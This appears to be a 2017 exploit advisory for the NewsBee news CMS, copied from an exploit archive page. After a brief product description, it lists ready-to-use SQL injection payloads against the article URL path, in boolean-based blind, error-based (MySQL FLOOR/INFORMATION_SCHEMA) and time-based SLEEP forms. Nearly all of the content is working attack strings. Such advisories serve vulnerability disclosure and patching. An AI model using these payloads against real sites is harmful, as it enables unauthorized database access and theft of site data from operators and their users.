32 lines
No EOL
1.6 KiB
Text
32 lines
No EOL
1.6 KiB
Text
Exploit Title: NewsBee CMS – SQL Injection
|
||
Date: 06.02.2017
|
||
Software Link: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937?s_rank=2
|
||
Exploit Author: Kaan KAMIS
|
||
Contact: iletisim[at]k2an[dot]com
|
||
Website: http://k2an.com
|
||
Category: Web Application Exploits
|
||
|
||
Overview
|
||
|
||
NewsBee is a Fully Featured News Site CMS (Content Management System). This CMS Includes almost everything you need to make a News Site easily and Creatively. The In build Features will help you to easily manage the site contents not only news articles, but also many other related contents which are commonly used in news sites.
|
||
Vulnerabilities:
|
||
|
||
SQL Injection
|
||
|
||
URL : http://localhost/newsbee/30[payload]_news_thai_soccer_targets_asia_wide_goals.html
|
||
|
||
Payload:
|
||
---
|
||
Parameter: #1* (URI)
|
||
Type: boolean-based blind
|
||
Title: AND boolean-based blind - WHERE or HAVING clause
|
||
Payload: http://localhost/newsbee/30' AND 5694=5694 AND 'fpmw'='fpmw_news_thai_soccer_targets_asia_wide_goals.html
|
||
|
||
Type: error-based
|
||
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
|
||
Payload: http://localhost/newsbee/30' AND (SELECT 4020 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (ELT(4020=4020,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Tdxc'='Tdxc_news_thai_soccer_targets_asia_wide_goals.html
|
||
|
||
Type: AND/OR time-based blind
|
||
Title: MySQL >= 5.0.12 OR time-based blind
|
||
Payload: http://localhost/newsbee/30' OR SLEEP(5) AND 'VLvJ'='VLvJ_news_thai_soccer_targets_asia_wide_goals.html
|
||
--- |